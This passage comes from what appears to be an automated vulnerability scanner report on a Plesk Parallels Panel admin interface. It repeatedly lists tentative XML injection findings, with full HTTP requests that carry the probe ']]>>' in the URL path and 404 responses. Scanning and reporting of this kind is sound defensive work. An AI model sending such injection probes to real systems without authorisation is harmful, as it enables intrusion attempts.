User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:04 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/domain/list

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/domain/list?context=domains HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/?group=Services
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=health

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:06:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/health/?group=Services HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/group/Services [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/parameters/group/Services

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /admin]]>>/health/parameters/group/Services HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/?group=Services
Content-Length: 57
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=health
Pragma: no-cache
Cache-Control: no-cache

forgery_protection_token=ec0f0703e9cb33b7ca9a593a4276029b

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:03:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/home HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:37 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin%27 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/admin%27

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/home/admin%27 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:37 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/reseller

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/home/reseller HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences?context=interface-pref
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=interface-pref; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:38:11 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/reseller/list?context=resellers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list/reset-search/true/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/reseller/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/personal-info/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:44:05 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/3/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/reseller/tools/id/3/?context=reseller-tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=service-plans

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:35:53 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/scripts/admin-panel.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/scripts/admin-panel.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/scripts/admin-panel.js?1301570630 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:32 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/settings

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/server/settings?context=settings HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/tools

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/server/tools?context=tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/create [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/create

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/subscription/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:46:51 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/subscription/list?context=subscriptions HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/true/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/reset-search/true/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/subscription/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/login [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/login

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/subscription/login?returnUrl=/admin/home/admin HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:58:56 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /favicon.ico

Issue detail

